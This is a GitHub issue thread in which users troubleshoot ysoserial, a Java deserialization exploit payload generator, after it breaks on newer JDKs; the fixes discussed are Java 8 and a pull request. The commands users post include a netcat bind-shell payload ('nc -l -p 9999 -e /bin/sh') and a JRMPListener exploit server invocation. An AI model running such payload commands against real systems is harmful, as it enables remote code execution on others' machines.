Error while generating or serializing payload #136

Closed
DoMINAToR98 opened this issue Nov 30, 2019 · 7 comments

@DoMINAToR98

OS: macOS High Sierra Version 10.13.6
$ java -jar ysoserial-master-30099844c6-1.jar Spring1 "/usr/bin/nc -l -p 9999 -e /bin/sh" 70 ↵
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by ysoserial.payloads.util.Gadgets (file:/Users/~/Desktop/ysoserial-master-30099844c6-1.jar) to constructor com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl()
WARNING: Please consider reporting this to the maintainers of ysoserial.payloads.util.Gadgets
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Error while generating or serializing payload
com.nqzero.permit.Permit$InitializationFailed: initialization failed, perhaps you're running with a security manager
at com.nqzero.permit.Permit.setAccessible(Permit.java:22)
at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:17)
at ysoserial.payloads.util.Reflections.getField(Reflections.java:24)
at ysoserial.payloads.util.Reflections.setFieldValue(Reflections.java:34)
at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:129)
at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)
at ysoserial.payloads.Spring1.getObject(Spring1.java:57)
at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: com.nqzero.permit.Permit$FieldNotFound: field "override" not found
at com.nqzero.permit.Permit.<init>(Permit.java:222)
at com.nqzero.permit.Permit.build(Permit.java:117)
at com.nqzero.permit.Permit.<clinit>(Permit.java:16)
... 7 more

Trying the same command on some Linux distro worked for me. Any solutions for this on macOSX?

@neubauek

neubauek commented Dec 7, 2019

Same here on Catalina.

java -jar ysoserial.jar CommonsCollections1 'calc.exe'
Error while generating or serializing payload
com.nqzero.permit.Permit$InitializationFailed: initialization failed, perhaps you're running with a security manager
at com.nqzero.permit.Permit.setAccessible(Permit.java:22)
at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:17)
at ysoserial.payloads.util.Reflections.getFirstCtor(Reflections.java:45)
at ysoserial.payloads.util.Gadgets.createMemoizedInvocationHandler(Gadgets.java:72)
at ysoserial.payloads.util.Gadgets.createMemoitizedProxy(Gadgets.java:67)
at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:71)
at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:43)
at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: com.nqzero.permit.Permit$FieldNotFound: field "override" not found
at com.nqzero.permit.Permit.<init>(Permit.java:222)
at com.nqzero.permit.Permit.build(Permit.java:117)
at com.nqzero.permit.Permit.<clinit>(Permit.java:16)
... 7 more

@XhstormR

Same here on Windows.

D:\Download>java --version
java 13.0.1 2019-10-15
Java(TM) SE Runtime Environment (build 13.0.1+9)
Java HotSpot(TM) 64-Bit Server VM (build 13.0.1+9, mixed mode, sharing)

D:\Download>java -jar ysoserial-master-30099844c6-1.jar Groovy1 calc.exe
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by org.codehaus.groovy.reflection.CachedClass$3$1 (file:/D:/Download/ysoserial-master-30099844c6-1.jar) to method java.lang.Object.finalize()
WARNING: Please consider reporting this to the maintainers of org.codehaus.groovy.reflection.CachedClass$3$1
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Error while generating or serializing payload
com.nqzero.permit.Permit$InitializationFailed: initialization failed, perhaps you're running with a security manager
        at com.nqzero.permit.Permit.setAccessible(Permit.java:22)
        at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:17)
        at ysoserial.payloads.util.Reflections.getFirstCtor(Reflections.java:45)
        at ysoserial.payloads.util.Gadgets.createMemoizedInvocationHandler(Gadgets.java:72)
        at ysoserial.payloads.Groovy1.getObject(Groovy1.java:39)
        at ysoserial.payloads.Groovy1.getObject(Groovy1.java:29)
        at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: com.nqzero.permit.Permit$FieldNotFound: field "override" not found
        at com.nqzero.permit.Permit.<init>(Permit.java:222)
        at com.nqzero.permit.Permit.build(Permit.java:117)
        at com.nqzero.permit.Permit.<clinit>(Permit.java:16)
        ... 6 more

@bestlzk

bestlzk commented Feb 5, 2020

I have the same problem when I use jdk13, and I solved this problem by using jdk8.

@RiRa12621

RiRa12621 commented Oct 5, 2020

You can mitigate this by specifically using Java 8:
/Library/Java/JavaVirtualMachines/adoptopenjdk-8.jdk/Contents/Home/bin/java -jar
on macOS, assuming you have Java 8 installed as an option.

You can find that out like this:

$ /usr/libexec/java_home -V
Matching Java Virtual Machines (3):
    15, x86_64: "AdoptOpenJDK 15"       /Library/Java/JavaVirtualMachines/adoptopenjdk-15.jdk/Contents/Home
    14.0.1, x86_64:     "OpenJDK 14.0.1"        /Library/Java/JavaVirtualMachines/openjdk.jdk/Contents/Home
    1.8.0_265, x86_64:  "AdoptOpenJDK 8"        /Library/Java/JavaVirtualMachines/adoptopenjdk-8.jdk/Contents/Home

/Library/Java/JavaVirtualMachines/adoptopenjdk-15.jdk/Contents/Home

@wh1tenoise

PS C:\Malware> java -version
java version "15.0.1" 2020-10-20
Java(TM) SE Runtime Environment (build 15.0.1+9-18)
Java HotSpot(TM) 64-Bit Server VM (build 15.0.1+9-18, mixed mode, sharing)

PS C:\Malware> java -cp .\ysoserial-master-6eca5bc740-1.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections5 'nslookup google.com'
Exception in thread "main" java.lang.IllegalArgumentException: Failed to construct payload
        at ysoserial.payloads.ObjectPayload$Utils.makePayloadObject(ObjectPayload.java:72)
        at ysoserial.exploit.JRMPListener.main(JRMPListener.java:113)
Caused by: com.nqzero.permit.Permit$InitializationFailed: initialization failed, perhaps you're running with a security manager
        at com.nqzero.permit.Permit.setAccessible(Permit.java:22)
        at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:17)
        at ysoserial.payloads.CommonsCollections5.getObject(CommonsCollections5.java:83)
        at ysoserial.payloads.CommonsCollections5.getObject(CommonsCollections5.java:51)
        at ysoserial.payloads.ObjectPayload$Utils.makePayloadObject(ObjectPayload.java:69)
        ... 1 more
Caused by: com.nqzero.permit.Permit$FieldNotFound: field "override" not found
        at com.nqzero.permit.Permit.<init>(Permit.java:222)
        at com.nqzero.permit.Permit.build(Permit.java:117)
        at com.nqzero.permit.Permit.<clinit>(Permit.java:16)
        ... 5 more

This problem seems to persist. Will this be fixed or is Java8 the way to go?

@Alexandre-Bartel
Contributor

Java >=12 does not allow access to private fields of certain sensitive classes (which Permit tries to do). Note that there is no portable Java trick anymore to access these fields. See https://bugs.openjdk.java.net/browse/JDK-8210522 for details.
A fix is in PR #149
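
The restriction described in the comment above can be checked directly on any installed JDK. This is an added example, not code from the thread, ysoserial or Permit: it asks core reflection for `java.lang.reflect.AccessibleObject.override`, the field named in the `FieldNotFound` traces. The class name `ReflectionFilterProbe` and the second probe (`Field.modifiers`) are assumptions of this example.

```java
import java.lang.reflect.AccessibleObject;
import java.lang.reflect.Field;

// Added example (not ysoserial or Permit code): reports whether this JVM's
// reflection filter hides the internal fields that older reflection helpers
// look up by name. Class name and probe list are assumptions of the example.
public class ReflectionFilterProbe {

    /** True if core reflection can still see the named declared field. */
    static boolean fieldVisible(Class<?> owner, String name) {
        try {
            owner.getDeclaredField(name);
            return true;
        } catch (NoSuchFieldException e) {
            // A filtered field is reported exactly like a missing one, which is
            // why the traces above say: field "override" not found.
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println("java.version = " + System.getProperty("java.version"));

        // Owner class / field name pairs; "override" is the one in the traces.
        Object[][] probes = {
            { AccessibleObject.class, "override" },
            { Field.class, "modifiers" },
        };
        boolean allVisible = true;
        for (Object[] p : probes) {
            Class<?> owner = (Class<?>) p[0];
            String name = (String) p[1];
            boolean visible = fieldVisible(owner, name);
            allVisible &= visible;
            System.out.printf("%-36s %-10s %s (%d declared fields visible)%n",
                    owner.getName(), name,
                    visible ? "visible" : "filtered",
                    owner.getDeclaredFields().length);
        }
        System.out.println(allVisible
                ? "Name-based lookup of these fields works on this runtime."
                : "Name-based lookup fails here; code relying on it needs an older JDK or a fix.");
    }
}
```

Compile it with `javac ReflectionFilterProbe.java` and run it under each installed JDK to compare the results across versions.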

@frohoff
Owner

frohoff commented Apr 23, 2022

Closed by #149

@frohoff frohoff closed this as completed Apr 23, 2022